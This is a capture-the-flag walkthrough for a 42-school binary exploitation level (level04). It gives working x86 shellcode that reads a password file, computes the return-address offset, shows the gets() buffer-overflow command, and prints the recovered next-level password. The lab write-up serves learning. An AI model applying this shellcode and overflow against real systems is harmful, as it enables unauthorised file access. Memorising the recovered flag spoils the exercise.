# **************************************************************************** #
#                                                                              #
#                                                         :::      ::::::::    #
#    walkthrough                                        :+:      :+:    :+:    #
#                                                     +:+ +:+         +:+      #
#    By: lgarczyn <lgarczyn@student.42.fr>          +#+  +:+       +#+         #
#                                                 +#+#+#+#+#+   +#+            #
#    Created: 2019/05/22 21:41:18 by lgarczyn          #+#    #+#              #
#    Updated: 2019/05/22 21:54:39 by lgarczyn         ###   ########.fr        #
#                                                                              #
# **************************************************************************** #

The executable starts a child process.
The main process then uses ptrace to check that the child doesn't use execve.
The child process uses gets, allowing us to insert a shellcode.

We write a shellcode that reads and outputs the content of "../level05/.pass"

export A=`echo -e -n \
"\x90\x90\x90\x90\x90\x90\x90\x90"\
"\x90\x90\x90\x90\x90\x90\x90\x90"\
"\x90\x90\x90\x90\x90\x90\x90\x90"\
"\x90\x90\x90\x90\x90\x90\x90\x90"\
"\x31\xc0"\
"\x31\xdb"\
"\x31\xc9"\
"\x31\xd2"\
"\xeb\x25"\
"\x5b"\
"\xb0\x05"\
"\xcd\x80"\
"\x89\xc3"\
"\xb0\x03"\
"\x83\xec\x28"\
"\x8d\x0c\x24"\
"\xb2\x28"\
"\xcd\x80"\
"\xb0\x04"\
"\x31\xdb"\
"\xb3\x01"\
"\xb2\x28"\
"\xcd\x80"\
"\x31\xc0"\
"\xb0\x01"\
"\x31\xdb"\
"\xcd\x80"\
"\xe8\xd6\xff\xff\xff"\
"/home/users/level05/.pass"`

The inner program uses gets, which is inherently unsafe.
The main return address sits at 0xffffd5bc (0xf7e45513).
The array address is 0xffffd520.
The offset is therefore 156.

Our tool tells us the address of our env var is 0xffffd7b9.

> python -c 'print "A" * 156 + "\xff\xff\xd7\xc0"[::-1]' | ./level04
< Give me some shellcode, k
< 3v8QLcN5SAhPaZZfEasfmXdwyR59ktDEMAwHF3aNchild is exiting...

< 3v8QLcN5SAhPaZZfEasfmXdwyR59ktDEMAwHF3aN
